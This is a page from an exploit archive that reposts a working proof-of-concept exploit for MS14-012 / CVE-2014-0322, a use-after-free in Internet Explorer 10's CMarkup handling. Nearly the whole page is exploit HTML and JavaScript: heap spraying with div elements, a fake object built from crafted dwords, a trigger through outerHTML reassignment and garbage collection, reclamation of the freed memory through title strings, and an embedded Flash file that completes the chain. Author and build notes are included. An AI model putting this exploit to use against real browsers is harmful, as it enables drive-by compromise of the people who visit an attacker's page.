Home / os / wins2003

MS14-012 Internet Explorer CMarkup Use-After-Free

Posted on 16 April 2014

<!--
 MS14-012 Internet Explorer CMarkup Use-After-Free
 Vendor Homepage: http://www.microsoft.com
 Version: IE 10
 Date: 2014-03-31
 Exploit Author: Jean-Jamil Khalife
 Tested on: Windows 7 SP1 x64 (fr, en)
 Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
 Home: http://www.hdwsec.fr
 Blog : http://www.hdwsec.fr/blog/
 MS14-012 / CVE-2014-0322

 Generation:
 c:mxmlcin>mxmlc.exe AsXploit.as -o AsXploit.swf

 E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as

-->

<html>
<head>
</head>
<body>

<script>

var g_arr = [];
var arrLen = 0x250;

function dword2data(dword)
{
 var d = Number(dword).toString(16);
 while (d.length < 8)
 d = '0' + d;

 return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}

function eXpl()
{
 var a=0;

 for (a=0; a < arrLen; a++) {
 g_arr[a] = document.createElement('div');
 }

 // Build a new object
 var b = dword2data(0x19fffff3);
 while (b.length < 0x360)
 {
 // mov eax,dword ptr [esi+98h]
 // ...
 // mov eax,dword ptr [eax+8]
 // and dword ptr [eax+2F0h],0FFFFFFBFh
 if (b.length == (0x98 / 2))
 {
 b += dword2data(0x1a000010);
 }
 // mov ecx,dword ptr [edx+94h]
 // mov eax,dword ptr [ecx+0Ch]
 else if (b.length == (0x94 / 2))
 {
 b += dword2data(0x1a111111);
 }
 // mov eax,dword ptr [edx+15Ch]
 // mov ecx,dword ptr [eax+edx*8]
 else if (b.length == (0x15c / 2))
 {
 b += dword2data(0x42424242);
 }
 else
 {
 b += dword2data(0x19fffff3);
 }
 }

 var d = b.substring(0, ( 0x340 - 2 )/2);

 // trigger
 try{
 this.outerHTML=this.outerHTML
 }
 catch(e){

 }

 CollectGarbage();

 // Replace freed object
 for (a=0; a < arrLen; a++)
 {
 g_arr[a].title = d.substring(0, d.length);
 }
}

// Trigger the vulnerability
function trigger()
{
 var a = document.getElementsByTagName("script");
 var b = a[0];
 b.onpropertychange = eXpl;
 var c = document.createElement('SELECT');
 c = b.appendChild(c);
}

</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>

 

TOP

Malware :

Exploits :